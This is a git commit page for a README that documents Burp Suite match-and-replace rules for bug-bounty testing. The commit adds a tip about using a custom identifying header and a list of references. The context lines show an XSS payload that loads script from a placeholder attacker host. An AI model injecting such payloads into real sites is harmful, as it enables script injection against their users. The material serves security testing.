daffainfo
/
match-replace-burp
mirror of https://github.com/daffainfo/match-replace-burp.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update README.md

pull/2/head
Muhammad Daffa 2022-05-05 01:19:25 +07:00 committed by GitHub
parent 7915fff690
commit 31b5b4190d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 15 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
README.md
View File

@ -82,6 +82,7 @@ By adding some XSS payload into the request
<img src="https://user-images.githubusercontent.com/36522826/166752610-9d21d86e-49e5-4e8f-86bc-a9134350d46d.png" width="400" />
> So by just inputting the words `xss_payload` on the website it will be immediately replaced with `"><script src=https://attacker.com></script>`
> Change the XSS payload as you want
## MISC
Some random match and replace rules
@ -90,3 +91,17 @@ Some random match and replace rules
<img src="https://user-images.githubusercontent.com/36522826/166748175-6782ce51-b10f-4b1d-b8a3-610ef142d567.png" width="400" />
> Create some another rules to look for them in headers, parameters and more. Because log4j can be found anywhere
* Help companies to identify your traffic and separate them from malicious traffic by adding a custom header
<img src="https://user-images.githubusercontent.com/36522826/166796789-e184716f-00a3-428d-9323-bcd985556798.png" width="400" />
References:
- https://twitter.com/PTestical/status/1413497660133318659
- https://twitter.com/HolyBugx/status/1355472991061213184
- https://twitter.com/intigriti/status/1192103070072741894
- https://twitter.com/payloadartist/status/1469582893772984322
- https://twitter.com/payloadartist/status/1422247377516122114
- https://twitter.com/hackerscrolls/status/1247177578269597698
> Soon will be updated again